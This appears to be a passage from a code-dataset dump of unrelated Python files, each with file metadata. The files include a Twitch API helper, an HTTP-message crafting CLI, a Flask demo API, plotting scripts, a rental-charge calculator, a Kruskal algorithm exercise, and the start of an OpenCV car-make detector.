link_extractor.links_to_follow(response):\n request = self._filter_link(link, seen)\n if request:\n yield request\n","sub_path":"slybot/slybot/plugins/scrapely_annotations/annotations.py","file_name":"annotations.py","file_ext":"py","file_size_in_byte":8372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"523155541","text":"# lbot_twitch.py\n\nimport os\nfrom dotenv import load_dotenv\n\nimport requests\n\nfrom secrets import token_hex\nimport hmac\nimport hashlib\nimport json\nimport time\nimport base64\n\nimport lbot_helpers as lh\n\nload_dotenv()\n\n# Load env vars from os.\ntry:\n CALLBACK_URL = os.getenv(\"CALLBACK_URL\")\nexcept:\n print(\"Error: No callback URL found in environment variables!\")\n raise EnvironmentError\n\ntry:\n TWITCH_CLIENT_ID = os.getenv(\"TWITCH_CLIENT_ID\")\nexcept:\n print(\"Error: No Twitch API Client ID found in environment variables!\")\n raise EnvironmentError\n\ntry:\n TWITCH_CLIENT_SECRET = os.getenv(\"TWITCH_CLIENT_SECRET\")\nexcept:\n print(\"Error: No Twitch API Client secret found in environment variables!\")\n raise EnvironmentError\n\ntry:\n TWITCH_APP_TOKEN = os.getenv(\"TWITCH_APP_TOKEN\")\nexcept:\n print(\"Error: No current app token found in environment variables!\")\n raise EnvironmentError\n\nTWITCH_API = \"https://api.twitch.tv/helix\"\n\n\n# Gets a new app token from the twitch auth service.\ndef get_twitch_token():\n # Right now, we have to renew the app token by hand every 60 days.\n # TODO: Auto-renewal of app access token.\n\n TWITCH_AUTH_URL = \"https://id.twitch.tv/oauth2/token\"\n params = {\n \"client_id\": TWITCH_CLIENT_ID,\n \"client_secret\": TWITCH_CLIENT_SECRET,\n \"grant_type\": \"client_credentials\",\n }\n\n try:\n request = requests.post(TWITCH_AUTH_URL, params=params)\n response = request\n except:\n raise lh.APIError(\n response.status_code,\n TWITCH_AUTH_URL,\n response.headers,\n response.reason,\n response.text,\n )\n\n return response\n\n\n# Revokes an app token that was issued to us.\ndef revoke_twitch_token(token):\n TWITCH_REVOKE_URL = \"https://id.twitch.tv/oauth2/revoke\"\n params = {\"client_id\": TWITCH_CLIENT_ID, \"token\": token}\n\n try:\n request = requests.post(TWITCH_REVOKE_URL, params=params)\n response = request\n except:\n raise lh.APIError(\n response.status_code,\n TWITCH_REVOKE_URL,\n response.headers,\n response.reason,\n response.text,\n )\n\n print(response)\n return response\n\n\n# TODO: renew_twitch_token function, storing tokens in file\n\n\n# Gets user id by name from the Helix/Get-Users endpoint.\ndef get_user_id(name):\n url = TWITCH_API + \"/users\"\n\n try:\n params = {\"login\": name}\n header = {\n \"Content-Type\": \"application/json\",\n \"Client-ID\": TWITCH_CLIENT_ID,\n \"Authorization\": f\"Bearer {TWITCH_APP_TOKEN}\",\n }\n\n request = requests.get(url=url, headers=header, params=params)\n response = request\n\n # print(response.json) # DEBUGGING\n user_id = response.json()[\"data\"][0][\"id\"]\n except IndexError:\n raise lh.InputError(message=\"User not found.\")\n except:\n raise lh.APIError(\n response.status_code, url, response.headers, response.reason, response.text\n )\n\n return user_id\n\n\n# Gets game name by id from the Helix/Get-Games endpoint.\ndef get_game_name(game_id):\n url = TWITCH_API + \"/games\"\n\n # Right now, we have to renew the app token by hand every 60 days.\n # TODO: Auto-renewal of app access token.\n\n try:\n params = {\"id\": game_id}\n header = {\n \"Content-Type\": \"application/json\",\n \"Client-ID\": TWITCH_CLIENT_ID,\n \"Authorization\": f\"Bearer {TWITCH_APP_TOKEN}\",\n }\n\n request = requests.get(url=url, headers=header, params=params)\n response = request\n\n try:\n # print(response.json) # DEBUGGING\n game_name = response.json()[\"data\"][0][\"name\"]\n except IndexError:\n print(\"No name data in API response.\")\n game_name = \"\"\n\n except:\n raise lh.APIError(\n response.status_code, url, response.headers, response.reason, response.text\n )\n\n return game_name\n\n\n# Establishes webhook with twitch API. Web module will return challenge and act as callback/handle incoming notifications.\ndef twitch_sub2webhook(mode, topic, lease):\n callback_target = CALLBACK_URL + \"/twitchapi/webhooks/callback/\"\n TWITCH_WEBHOOK_HUB = TWITCH_API + \"/webhooks/hub/\"\n\n # temp_secret = token_hex(nbytes=8)\n # temp_secret = '' # DEBUGGING\n # os.environ['TEMP_SECRET'] = temp_secret # Causes problems on heroku\n # TODO: Store fresh TEMP_KEY in file and hand over to lbot_web.py for signature verification.\n\n try:\n load_dotenv()\n temp_secret = os.environ[\"TEMP_SECRET\"]\n # print(temp_secret) # DEBUGGING\n except:\n print(\"No temporary secret found in environment variables.\")\n raise EnvironmentError\n\n params = {\n \"hub.mode\": mode,\n \"hub.topic\": TWITCH_API + topic,\n \"hub.callback\": callback_target,\n \"hub.lease_seconds\": lease,\n \"hub.secret\": temp_secret,\n }\n\n header = {\n \"Content-Type\": \"application/json\",\n \"Client-ID\": TWITCH_CLIENT_ID,\n \"Authorization\": f\"Bearer {TWITCH_APP_TOKEN}\",\n }\n\n request = requests.post(TWITCH_WEBHOOK_HUB, headers=header, params=params)\n response = request\n\n # print(params, header) # DEBUGGING\n # print(response) # DEBUGGING\n # print(response.reason) # DEBUGGING\n return response\n","sub_path":"lbot_twitch.py","file_name":"lbot_twitch.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"161455428","text":"from sys import stdin, argv\nfrom argparse import ArgumentParser\n\nfrom fn.cli import *\nfrom fn.http.messages import request, response, parseRequest, parseResponse\nfrom fn.http.pairs import setValuesByName\n\nREQUEST = 0x01\nRESPONSE = 0x00\n# TODO PIPELINE = 0x80, REQUEST_PIPELINE = REQUEST|PIPELINE, ...\n\nclass Command(object):\n \"\"\"\n Shell command exercising flintnapper's API.\n \"\"\"\n\n prog = \"fn\"\n desc = \"flintnapper (fn) - Craft, parse, and modify HTTP messages.\"\n epilog = \"For source, docs, bug, etc: \" + \\\n \"https://github.com/xmnr/flintnapper\"\n\n defaultRequest = request()\n defaultResponse = response()\n\n def parseArguments(self, arguments):\n\n parser = self.makeArgParser()\n arguments = parser.parse_args(arguments)\n return parser, arguments\n\n def load(self, arguments):\n \"\"\"\n Looks through the arguments to find directives specifying the message\n (ie, -M, --stdin, etc). If none are found, the defaultRequest/\n defaultResponse are used.\n \"\"\"\n\n request = arguments.messageType == REQUEST\n type = \"request\" if request else \"response\"\n if arguments.message:\n if request: message = parseRequest(arguments.message)\n else: message = parseResponse(arguments.message)\n elif arguments.stdin:\n info(\n \"Reading {} from stdin\".format(type),\n arguments.verbose\n )\n if request: message = readRequest()\n else: message = self.readResponse()\n elif arguments.file:\n info(\n \"Reading {} from {}\".format(type, arguments.file),\n arguments.verbose\n )\n f = open(arguments.file, \"r\")\n if request: message = readRequest(f)\n else: message = self.readResponse(f)\n else:\n if request: message = self.defaultRequest\n else: message = self.defaultResponse\n\n return message\n\n def alter(self, message, arguments):\n \"\"\"\n Performs operations specified in the arguments to modify the message in\n whatever way.\n \"\"\"\n\n message = message.copy()\n\n # Entity\n\n if arguments.entity:\n message[\"entity\"] = arguments.entity\n if arguments.readEntity:\n message[\"entity\"] = open(arguments.readEntity, \"r\").read()\n if arguments.entityStdin:\n message[\"entity\"] = stdin.read()\n if arguments.appendEntity:\n message[\"entity\"] += arguments.appendEntity\n if arguments.appendEntityStdin:\n message[\"entity\"] += stdin.read()\n if arguments.appendEntityFile:\n message[\"entity\"] += open(arguments.appendEntityFile, \"r\").read()\n\n # Top-line\n\n if arguments.version:\n message[\"version\"] = arguments.version\n if arguments.method:\n message[\"method\"] = arguments.method.upper()\n if arguments.path:\n message[\"path\"] = arguments.path\n if arguments.status:\n message[\"status\"] = arguments.status\n if arguments.reason:\n message[\"reason\"] = arguments.reason.upper()\n\n # Headers\n\n for header in arguments.header:\n message[\"headers\"] = setValuesByName(message[\"headers\"], *header)\n if arguments.host:\n message[\"headers\"] = setValuesByName(message[\"headers\"], \"Host\", arguments.host)\n if arguments.auto: # obviously must come after entity\n message[\"headers\"] = setValuesByName(\n message[\"headers\"],\n \"Content-length\",\n str(len(message[\"entity\"]))\n )\n\n return message \n\n def execute(self, argv=argv, test=False):\n\n parser, arguments = self.parseArguments(argv[1:])\n exitCode = SUCCESS\n message = None\n try:\n arguments = self.checkSanity(arguments)\n message = self.alter(self.load(arguments), arguments)\n \n if arguments.messageType == RESPONSE and arguments.verboseExitCode:\n status = message[\"status\"]\n # FIXME these magic values should come from fn.http\n if status.startswith(\"2\"): exitCode = SUCCESS\n elif status.startswith(\"1\"): exitCode = INFORMATION\n elif status.startswith(\"3\"): exitCode = REDIRECT\n elif message[\"status\"].startswith(\"4\"): exitCode = CLIENT_ERROR\n elif message[\"status\"].startswith(\"5\"): exitCode = SERVER_ERROR\n else: exitCode = UNKNOWN_ERROR\n\n except ArgumentError as e:\n error(e.message)\n exitCode = ARGUMENT_ERROR\n\n if test:\n return message, exitCode\n else:\n writeMessage(message)\n exit(exitCode)\n\n # Arguments\n\n def makeArgParser(self):\n\n parser = ArgumentParser(\n prog = self.prog,\n description = self.desc,\n epilog = self.epilog,\n add_help = False,\n )\n\n # Input\n parser.add_argument(\"-M\", \"--message\", metavar=\"httpMessage\",\n help=\"Specify an HTTP message (a request or response) from the command line.\")\n parser.add_argument(\"-s\", \"--stdin\", action=\"store_true\", help=\"Read a message from stdin.\")\n parser.add_argument(\"-f\", \"--file\", help=\"Read a message from a file.\")\n parser.add_argument(\"-rQ\", \"--request\", action=\"store_const\", dest=\"messageType\",\n const=REQUEST, help=\"Parse message as a request.\")\n parser.add_argument(\"-rP\", \"--response\", action=\"store_const\", dest=\"messageType\", const=RESPONSE,\n help=\"Parse message as a response.\")\n # TODO format string input. -MF, --fromFormat\n # TODO pipelines. -P, --pipeline | --duplex for pipelines with requests & responses\n # Operations\n parser.add_argument(\"-h\", \"--header\", metavar=(\"key\", \"value\"), nargs=2, action=\"append\", default=[],\n help=\"Change the value of a header, append it if it isn't found. Can be used many times.\")\n parser.add_argument(\"-C\", \"--adjustContentLen\", action=\"store_true\",\n help=\"Adjust the Content-length for the attached entity.\", dest=\"auto\")\n parser.add_argument(\"-H\", \"--host\", metavar=\"hostname\", help=\"Set the Host header.\")\n parser.add_argument(\"-e\", \"--entity\", metavar=\"string\",\n help=\"Set the entity. Does not update the content length (use -C for that).\")\n parser.add_argument(\"-eS\", \"--entityStdin\", action=\"store_true\", help=\"Read stdin into the entity.\")\n parser.add_argument(\"-eF\", \"--readEntity\", metavar=\"file\", help=\"Read a file into the entity.\")\n parser.add_argument(\"-eA\", \"--appendEntity\", metavar=\"string\", help=\"Append a string to the entity.\")\n parser.add_argument(\"-eAS\", \"--appendEntityStdin\", help=\"Append the contents of stdin to entity.\", action=\"store_true\")\n parser.add_argument(\"-eAF\", \"--appendEntityFile\", metavar=\"file\", help=\"Append the contents of a file to entity.\")\n parser.add_argument(\"-v\", \"--version\", metavar=\"httpVersion\", help=\"Set the HTTP version (ie, -v HTTP/1.1).\")\n parser.add_argument(\"--0.9\", \"--HTTP/0.9\", const=\"HTTP/0.9\", action=\"store_const\", dest=\"version\")\n parser.add_argument(\"--1.0\", \"--HTTP/1.0\", const=\"HTTP/1.0\", action=\"store_const\", dest=\"version\")\n parser.add_argument(\"--1.1\", \"--HTTP/1.1\", const=\"HTTP/1.1\", action=\"store_const\", dest=\"version\")\n parser.add_argument(\"-m\", \"--method\", metavar=\"method\")\n parser.add_argument(\"--get\", const=\"GET\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--post\", const=\"POST\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--head\", const=\"HEAD\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--options\", const=\"OPTIONS\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"--trace\", const=\"TRACE\", action=\"store_const\", dest=\"method\")\n parser.add_argument(\"-p\", \"--path\", metavar=\"path\", help=\"Set the request path.\")\n parser.add_argument(\"-S\", \"--status\", metavar=\"statusCode\")\n parser.add_argument(\"--200\", const=\"200\", action=\"store_const\", dest=\"status\")\n parser.add_argument(\"--404\", const=\"404\", action=\"store_const\", dest=\"status\")\n parser.add_argument(\"--500\", const=\"500\", action=\"store_const\", dest=\"status\")\n parser.add_argument(\"-r\", \"--reason\", metavar=\"reasonString\")\n parser.add_argument(\"--ok\", const=\"OK\", action=\"store_const\", dest=\"reason\")\n parser.add_argument(\"--not-found\", const=\"Not Found\", action=\"store_const\", dest=\"reason\")\n parser.add_argument(\"--internal-error\", const=\"Internal Server Error\", action=\"store_const\", dest=\"reason\")\n # TODO make a way for values that are normalized (ie, status) to be case sensitive (-c, --case, --case-sensitive)\n # TODO omit the top line\n # TODO URLs\n # TODO select messages in pipeline. -N n, --inPipeline n.\n # TODO zipper together request pipelines & response pipelines into duplex pipelines\n # Output\n # TODO format string output. -OF, --toFormat\n # TODO pipeline count. --count.\n # Misc\n parser.add_argument(\"-V\", \"--verbose\", action=\"store_true\",\n help=\"Display warnings & info.\")\n parser.add_argument(\"-vE\", \"--verboseExitCode\", action=\"store_true\",\n help=\"When parsing a response, use the exit code to indicate the status code.\"\n )\n parser.add_argument(\"-?\", \"--help\", action=\"help\", help=\"Display this help text.\")\n # TODO help for format schemas\n\n return parser\n\n def checkSanity(self, arguments):\n \"\"\"\n Raises an ArgumentError if arguments are in conflict with each other,\n and makes sure arguments.messageType is set.\n\n If it hasn't been specified by the command line, it's value is guessed\n based on the presence of arguments for altering the method or path vs.\n status or reason. If it cannot be determined, it defaults to parsing the\n message as a request.\n \"\"\"\n\n requestArgs = (arguments.method or arguments.path)\n responseArgs = (arguments.status or arguments.reason)\n if arguments.messageType is None:\n if requestArgs: arguments.messageType = REQUEST\n elif responseArgs: arguments.messageType = RESPONSE\n else:\n info(\"Warning: unable to deduce message type \" + \\\n \"(default is request).\", arguments.verbose)\n arguments.messageType = REQUEST\n if (\n (arguments.messageType == REQUEST and responseArgs) or \\\n (arguments.messageType == RESPONSE and requestArgs)\n ):\n raise ArgumentError(\"Message type conflict.\")\n \n\n if map(\n bool,\n (\n arguments.stdin,\n arguments.entityStdin, \n arguments.appendEntityStdin\n )\n ).count(True) > 1:\n\n raise ArgumentError(\"Only one argument can read from stdin.\")\n\n return arguments\n\ndef execute(*args):\n\n args = (\"fn\", ) + args\n return Command().execute(args, test=True)\n","sub_path":"fn/cli/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":11341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"478067725","text":"# 안정적인 문자열 - S1\n\nimport sys\n\ndef stable(data,num):\n ans=0\n stack=list()\n\n for i in data:\n if i=='{':\n stack.append(i)\n else:\n if len(stack)==0 or stack[-1]=='}':\n stack.append(i)\n else:\n stack.pop()\n\n if len(stack)>0:\n for i in range(0,len(stack),2):\n w1,w2=stack[i], stack[i+1]\n\n if w1==w2:\n ans+=1\n else:\n ans+=2\n \n print(str(num)+'.',ans)\n\n\nif __name__==\"__main__\": \n case=1\n\n while True:\n sentence=sys.stdin.readline().rstrip();\n\n if '-' in sentence:\n break\n else:\n stable(sentence,case)\n case+=1\n ","sub_path":"String/BOJ_4889.py","file_name":"BOJ_4889.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"361433936","text":"import numpy as np\r\nfrom scipy import stats\r\nfrom scipy.optimize import curve_fit\r\nimport matplotlib.pyplot as plt\r\nimport uncertainties.unumpy as unp\r\n\r\nX = np.genfromtxt('build/2a1.temp')\r\n\r\n\r\ny = np.linspace(0,2,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,np.cos(y),label='$\\cos(y)$')\r\n#plt.plot(f(R2,*params), R2, 'r-', label='fit')\r\nplt.xlim(0,np.pi/2)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$y$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2a1.pdf')\r\n\r\n\r\n\r\nX = np.genfromtxt('build/2a2.temp')\r\n\r\n\r\ny = np.linspace(-2,2,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,np.cos(y)/2,label='$\\cos(y) / 2$')\r\n#plt.plot(f(R2,*params), R2, 'r-', label='fit')\r\nplt.xlim(-np.pi/2,np.pi/2)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$y$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2a2.pdf')\r\n\r\nX = np.genfromtxt('build/2b.temp')\r\ny = np.linspace(-5,11,1000)\r\n\r\n#y = np.linspace(-2,2,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,1/np.sqrt(8*np.pi)*np.exp(-(y-3)*(y-3)/8),label='Gauß-Verteilung')\r\n#plt.plot(f(R2,*params), R2, 'r-', label='fit')\r\nplt.xlim(-5,11)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$y$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2b.pdf')\r\n\r\nX = np.genfromtxt('build/2c.temp')\r\n\r\ndef g(x):\r\n\ttemp = []\r\n\tfor value in x:\r\n\t\tif(value<3):\r\n\t\t\ttemp.append(np.exp((value - 3)))\r\n\t\telse:\r\n\t\t\ttemp.append(np.exp(-(value - 3)))\r\n\ttemp = np.array(temp)\r\n\treturn temp\r\n\r\ndef g2(x):\r\n\treturn np.exp(-np.abs(x - 3))\r\n\r\n\r\ny = np.linspace(-2,8,1000)\r\nplt.cla()\r\nplt.clf()\r\nplt.hist(X, label='Zufallszahlen',normed=True,bins=100)\r\nplt.plot(y,1/np.sqrt(2*np.pi)*np.exp(-(y-3)*(y-3)/2),label='Gauß-Verteilung')\r\nplt.plot(y,np.exp(0.5)/np.sqrt(2*np.pi)*g2(y),label='$k \\cdot g(x)$')\r\n#plt.plot(f(R2,*params), R2, 'r-', label='fit')\r\nplt.xlim(-2,8)\r\nplt.ylim(0,1)\r\nplt.xlabel(r'$x$')\r\n#plt.ylabel(r'$R$')\r\nplt.legend(loc='best')\r\nplt.tight_layout(pad=0, h_pad=1.08, w_pad=1.08)\r\nplt.savefig('build/2c.pdf')\r\n\r\n\r\n","sub_path":"Blatt02/Aufgabe2.py","file_name":"Aufgabe2.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"254497376","text":"from flask import Flask,request\r\nfrom flask_restful import Api, Resource,reqparse\r\n\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\nvideos_put_args = reqparse.RequestParser()\r\nvideos_put_args.add_argument(\"name\", type=str,help=\"name of the video\",required=True)\r\nvideos_put_args.add_argument(\"views\",type=int,help=\"Views of teh vadeo\",required=True)\r\nvideos_put_args.add_argument(\"likes\",type=int ,help=\"Likes on the vadeo\",required=True)\r\n\r\nvideos= {}\r\n\r\nclass Video(Resource):\r\n def get(self,video_id):\r\n return videos[video_id]\r\n def put(self,video_id):\r\n args = videos_put_args.parse_args()\r\n videos[video_id]= args\r\n return videos[video_id],201\r\n\r\n\r\napi.add_resource(Video,'/video/')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"201727217","text":"'''\nReturns total price paid for individual rentals.\n\nTesting for possible fault and exiting the loop to continue on.\nCurrent implementation will stop processing after first fault.\n'''\nimport argparse\nimport json\nimport datetime\nimport math\nimport logging\nimport sys\n\nLOG_FORMAT = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\nLOG_FILE = datetime.datetime.now().strftime(\"%Y-%m-%d\")+'.log'\nFORMATTER = logging.Formatter(LOG_FORMAT)\n\nFH = logging.FileHandler(LOG_FILE)\nCH = logging.StreamHandler()\nFH.setFormatter(FORMATTER)\nCH.setFormatter(FORMATTER)\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.DEBUG)\nLOGGER.addHandler(FH)\nLOGGER.addHandler(CH)\n\n\ndef parse_cmd_arguments():\n '''Parse Command Line Arguments.'''\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('-i', '--input', help='input JSON file', required=True)\n parser.add_argument('-o', '--output', help='ouput JSON file', required=True)\n parser.add_argument('-d', '--debug', help='debug level', type=int,\n default=0, choices=range(4), required=False)\n return parser.parse_args()\n\n\ndef load_rentals_file(filename):\n '''load data from file.'''\n with open(filename) as file:\n try:\n logging.debug(\"Loading %s.\", filename)\n data = json.load(file)\n logging.debug(\"Loaded %s.\", filename)\n except FileNotFoundError:\n logging.error(\"Failed to load input json file %s.\", filename)\n sys.exit(0)\n logging.debug(\"Loaded %s entries.\", len(data))\n return data\n\n\ndef calculate_additional_fields(data):\n '''Make additional field calculations.'''\n for value in data.values():\n try:\n #if logging level > a given level for grouped logging evaluations.\n #would reduce calls to if statements to one.\n if not value['rental_start']:\n #Missing source DATA, resulting in an error.\n logging.error(\"Start date is missing for %s.\", value['product_code'])\n continue\n if not value['rental_end']:\n #Log warning if end date is missing\n logging.warning(\"End date is missing for %s.\", value['product_code'])\n logging.debug(\"%s\", value)\n #skip calculations if end date is missing.\n continue\n if value['units_rented'] < 1:\n logging.warning(\"Units rented of %s is less than one.\", value['product_code'])\n continue\n rental_start = datetime.datetime.strptime(value['rental_start'], '%m/%d/%y')\n rental_end = datetime.datetime.strptime(value['rental_end'], '%m/%d/%y')\n if rental_start > rental_end:\n #incorrect result, therefore an error.\n logging.error(\"Rental end is before rental start for %s.\", value['product_code'])\n #avoid except clause for this condition.\n continue\n value['total_days'] = (rental_end - rental_start).days\n\n #DATAset is unclear, but logically price_per_day should for one unit.\n #But price_per_day could be for units_rented.\n #Code suggests this given the unit_cost calculation.\n value['total_price'] = value['total_days'] * value['price_per_day']\n\n #Pointless line that highlights the negative days error.\n value['sqrt_total_price'] = math.sqrt(value['total_price'])\n value['unit_cost'] = value['total_price'] / value['units_rented']\n except: # pylint: disable=W0702\n logging.error(\"Hit unknown error in calculate_additional_fields.\")\n logging.error(\"%s\", value)\n continue\n # exit(0)\n\n return DATA\n\n\ndef save_to_json(filename, data):\n '''Save output file function.'''\n try:\n logging.debug(\"Writing output file to %s.\", filename)\n with open(filename, 'w') as file:\n json.dump(data, file)\n logging.debug(\"Wrote output file to %s.\", filename)\n except IOError as io_error:\n logging.error(\"Failed to write output file to %s.\", filename)\n logging.error(\"%s\", dir(io_error))\n\n\nif __name__ == \"__main__\":\n ARGS = parse_cmd_arguments()\n LEVEL = ARGS.debug\n if LEVEL == 0:\n #Disable logging\n LOGGER.disabled = True\n elif LEVEL == 1:\n FH.setLevel(logging.ERROR)\n CH.setLevel(logging.ERROR)\n elif LEVEL == 2:\n FH.setLevel(logging.WARNING)\n CH.setLevel(logging.WARNING)\n elif LEVEL == 3:\n FH.setLevel(logging.WARNING)\n CH.setLevel(logging.DEBUG)\n\n logging.debug(\"Input file provided: %s.\", ARGS.input)\n logging.debug(\"Output file provided: %s.\", ARGS.output)\n logging.debug(\"Debug level is %s.\", ARGS.debug)\n\n logging.error(\"Generate an error.\")\n\n DATA = load_rentals_file(ARGS.input)\n DATA = calculate_additional_fields(DATA)\n save_to_json(ARGS.output, DATA)\n","sub_path":"students/smckellips/lesson02/assignment/code/charges_calc.py","file_name":"charges_calc.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"95861184","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 14:24:45 2019\n\n@author: akmil\n\"\"\"\n\n'''\nExercise 2: Write a program to look for lines of the form:\nNew Revision: 39772\nExtract the number from each of the lines using a regular expression\nand the findall() method. Compute the average of the numbers and\nprint out the average.\nEnter file:mbox.txt\n38444.0323119\nEnter file:mbox-short.txt\n39756.9259259\n'''\n\nimport re\n\nfilename = input('Enter a filename: ')\ncount = 0\nlst = list()\ntotal = 0\n\nwith open(filename, 'r') as f:\n for line in f:\n line = line.rstrip()\n if re.search('New Revision: [0-9]+', line):\n total += int(list.pop(re.findall('New Revision: ([0-9]+)', line)))\n count += 1\n else :\n continue\nprint(f\"Revision avg: {round(total/count, 7)}\")\n","sub_path":"Assignment4/11_2_excercise.py","file_name":"11_2_excercise.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"526213153","text":"#Question 3\r\n\r\nclass Graph:\r\n def __init__(self, vertices):#permet de créer un graphe lorsqu'on écrit p.ex Graph(6), il faut notamment indiquer le nombre de sommets\r\n self.V = vertices\r\n self.graph = []\r\n\r\n def add_edge(self, u, v, w):#ajoute une arête entre le sommet u et v avec un poids w\r\n self.graph.append([u, v, w])\r\n\r\n def find(self, parent, i):#Correspond à la fonction Find-set(x) présentée dans le cours\r\n if parent[i] == i:\r\n return i\r\n return self.find(parent, parent[i])\r\n\r\n def apply_union(self, parent, rank, x, y):#Correspond à la fonction Union(x,y) présentée dans le cours\r\n xroot = self.find(parent, x)\r\n yroot = self.find(parent, y)\r\n if rank[xroot] < rank[yroot]:\r\n parent[xroot] = yroot\r\n elif rank[xroot] > rank[yroot]:\r\n parent[yroot] = xroot\r\n else:\r\n parent[yroot] = xroot\r\n rank[xroot] += 1\r\n \r\ng = Graph(6)\r\ng.add_edge(0, 1, 4)\r\ng.add_edge(0, 2, 4)\r\ng.add_edge(1, 2, 2)\r\ng.add_edge(1, 0, 4)\r\ng.add_edge(2, 0, 4)\r\ng.add_edge(2, 1, 2)\r\ng.add_edge(2, 3, 3)\r\ng.add_edge(2, 5, 2)\r\ng.add_edge(2, 4, 4)\r\ng.add_edge(3, 2, 3)\r\ng.add_edge(3, 4, 3)\r\ng.add_edge(4, 2, 4)\r\ng.add_edge(4, 3, 3)\r\ng.add_edge(5, 2, 2)\r\ng.add_edge(5, 4, 3)\r\n\r\ndef kruskal_algo(Graph):\r\n result = []#Permettra de stocker le résultat\r\n i, e = 0, 0 #Index utilisé dans l'algorithme\r\n \r\n Graph.graph = sorted(Graph.graph, key=lambda item: item[2]) #Trie les arêtes par poids croissant, étape 1)\r\n parent = []\r\n rank = []\r\n \r\n \r\n for node in range(Graph.V):#Cette boucle parcourt tous les sommets du graphes et crée un ensemble pour chacun d'entre eux\r\n parent.append(node)\r\n rank.append(0)\r\n \r\n #Tant que le nombre d'arêtes est inférieur à V-1, notre sous-graphe n'atteint pas tous les sommets -> on continue\r\n while e < Graph.V - 1:\r\n \r\n u, v, w = Graph.graph[i] #self.graph contient les arêtes par ordre croissant de poids, on commence avec i = 0\r\n i = i + 1 #puis à l'itération suivante on voudra avoir la 2ème arête la plus légère, donc on \r\n #incrémente.\r\n \r\n x = Graph.find(parent, u)#Ces 2 lignes des codes permettent de rechercher et de stocker à quel ensemble \r\n y = Graph.find(parent, v)#appartiennent u et v.\r\n \r\n if x != y: #Si u et v font déjà parti du Minimum Spanning Tree, i.e. u et v appartiennent au même ensemble\r\n #Alors on ne veut pas ajouter cette arête au minimum spanning-tree, d'ou le x!=y\r\n e = e + 1 #Si u et v sont d'ensemble différent, on a atteint un sommet de plus donc on incrémente\r\n result.append([u, v, w])#On ajoute la nouvelle arête au résultat\r\n Graph.apply_union(parent, rank, x, y)#On fusionne l'ensemble auquel appartient v à celui auquel appartient u\r\n for u, v, weight in result:\r\n print(\"%d - %d: %d\" % (u, v, weight))#méthode permettant d'imprimer le résultat\r\n \r\n return result\r\n \r\nkruskal_algo(g)","sub_path":"2022/week12/resources/Exercice3.py","file_name":"Exercice3.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"310920158","text":"import cv2\nimport os\nimport numpy as np\n\nclass Box():\n def __init__(self,name, x, y, width, height,conf=0.0, mid_y = 0):\n self.name = name\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.mid_y = mid_y\n self.conf = conf\n\nnet_large=cv2.dnn.readNetFromCaffe(\"models/CGIM_make_large_loc.prototxt\",\"models/CGIM_make_large_loc3.caffemodel\")\nnet_small=cv2.dnn.readNetFromCaffe(\"models/CGIM_make_loc.prototxt\",\"models/CGIM_make_loc.caffemodel\")\n\ncharDic=[\"None\",\"Infiniti\",\"Lincoln\",\"Volkswagen\",\"Jeep\",\"Buick\",\"Volvo\",\"Hyundai\",\"Mercury\",\"Cadillac\",\n \"Subaru\",\"Ford\",\"Mitsubishi\",\"Lexus\",\"Acura\",\"Chrysler\",\"Gmc\",\"Honda\",\"Nissan\",\"Isuzu\",\n \"Chevrolet\",\"Toyota\",\"BMW\",\"Kia\",\"Audi\",\"MercedesBenz\",\"Scion\",\"Mazda\",\"Dodge\"]\ncharDic = [item[0].upper()+item[1:] for item in charDic]\n\ndef getLargeMakeBox(orgImg):\n (h, w, c) = orgImg.shape\n blob = cv2.dnn.blobFromImage(orgImg, 0.007843, (400, 400), 127.5, False, False)\n net_large.setInput(blob, \"data\")\n detection = net_large.forward(\"detection_out\")\n boxes = []\n for i in np.arange(0, 